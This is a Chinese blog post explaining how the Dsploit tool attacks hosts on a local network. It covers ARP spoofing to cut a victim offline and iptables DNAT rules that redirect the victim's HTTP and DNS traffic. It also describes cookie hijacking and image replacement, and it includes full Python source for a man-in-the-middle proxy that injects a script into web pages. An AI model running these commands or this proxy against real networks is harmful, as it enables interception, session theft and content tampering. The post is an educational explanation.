之前研究Dsploit的部分功能实现原理,现在了解的差不多了,简要记录下Dsploit的断网攻击,html注入,图片替换,cookie劫持的原理。本篇blog需要有一定的网络知识基础在看。
假设现有三台主机,A代表网关,B代表攻击者,C代表受害者。A,B,C的ip分别为192.168.1.1 192.168.1.2 192.168.1.3
B使用Nmap扫描当前网段下的主机,发现了网关A,联网主机C。
断网原理:B如果想让C断网,只需要用arpspoof不断发arp reply包将自己伪装为网关A,即发送的arp reply包中ip为网关的ip192.168.1.1,但是arp reply中的mac却是自己的,这样C主机会将数据发送给攻击者B,如果攻击者B没有设置ip转发,那么主机C就会断网。
html注入,图片替换,cookie劫持原理:
在上述的断网原理下,如果攻击者B开启了ip转发功能,用iptables工具输入 iptables -t nat -s 192.168.1.3 -p tcp --dport 80 -j DNAT --to 192.168.1.2:8080
将主机C发送的目的端口是80的tcp报文转发到本机监听的端口8080上(注:这里8080只是举例用,不一定非要8080,只要是http代理监听的端口就行)
然后主机B在本机上运行http代理程序,http代理根据主机C发的http头可知主机C要连接的网站是哪个网站,根据网址将http请求转发,再将网站的响应转发给主机C,这样主机C还不知道自己的数据已经被窃听到了。
html注入发生在攻击者B将网站的响应转发给主机C的过程中,若http代理发现该响应可以注入html代码,就将html代码注入到响应后,再将注入后的响应发送给主机C,cookie劫持,图片替换发生在攻击者B转发主机C的http请求时,http代理将主机C发送的http请求中的cookie记录下来,就可利用主机C的cookie来进行登录服务。若http代理发现http头请求的文件类型为图片,则直接转发自己定义的图片给主机C。
DNS劫持原理与html注入类似,iptables -t nat -p udp --dport 53 -j DNAT --to 192.168.1.2:3000将DNS请求转发给本机的DNS代理,根据DNS报文的内容决定要不要伪造DNS响应。
下面给一个简单的http代理程序源码,本http代理会在响应中注入<script>alert("you have been hacked.")</script>
#!/ # coding = utf-8 import socket import threading import re class HttpHeaderParser(object): def __init__(self, arg): super(HttpHeaderParser, self).__init__() self.arg = arg self._parse(); def _parse(self): try: #print 'raw data:\n' + self.arg; data = self.arg[self.arg.find('\r'):self.arg.find('\n\r\n')] self.name = re.findall('\n(.*?):',data); self.value = re.findall(':(.*?)\r',data); self.body = self.arg[self.arg.find('\r\n\r\n') + 4:]; self.status = self.arg[0:self.arg.find('\r\n')]; for i in range(0,len(self.value)): self.value[i] = self.value[i].lstrip();#过滤不必要的空格 self._getHostAddr(); except: print 'error'; #print self.arg; def getAttribute(self,name): if name in self.name: return self.value[self.name.index(name)]; return None; def setAttribute(self,name,value): if name in self.name: self.value[self.name.index(name)] = value; return ; self.name.append(name); self.value.append(value); def _getHostAddr(self): self.host = self.getAttribute('Host'); self.port = 80; if ':' in self.host: tmp = self.host; self.host = tmp[0:tmp.find(':')]; self.host = socket.gethostbyname(self.host); self.port = int(tmp[tmp.find(':') + 1:]) def getAddr(self): return (self.host,self.port); def buildHeader(self): tmp = self.status + '\r\n'; for i in range(0,len(self.name)): tmp = tmp + self.name[i] + ':' + self.value[i] + '\r\n'; tmp = tmp + '\r\n' + self.body; #print 'build:\n' + tmp; return tmp; def proc(client): data = client.recv(2048); #print data; if data: parser = HttpHeaderParser(data); addr = parser.getAddr(); if addr[0] == '192.168.155.1': addr = (socket.gethostbyname('123.207.127.183'),80); parser.setAttribute('Host','123.207.127.183') parser.setAttribute('Accept-Encoding',''); head = parser.buildHeader(); sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM); sock.connect(addr); sock.sendall(head); html = sock.recv(2048); while html: html = html.replace('<body>','<body><script>alert(\"you have been hacked.\")</script>'); print html; client.sendall(html); html = sock.recv(1024); sock.close(); client.close(); def main(): addr = ('0.0.0.0',3000); sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM); sock.bind(addr); sock.listen(80); b = True; while b: client,clientaddr = sock.accept(); t = threading.Thread(target = proc,args =(client,)); t.start(); #t.join(); sock.close(); print 'finish!!!'; if __name__ == '__main__': main()
在本机设置为http代理运行之后,打开网页
会先出现
然后才是网站的真正响应。
ps:如有错误,欢迎指正。
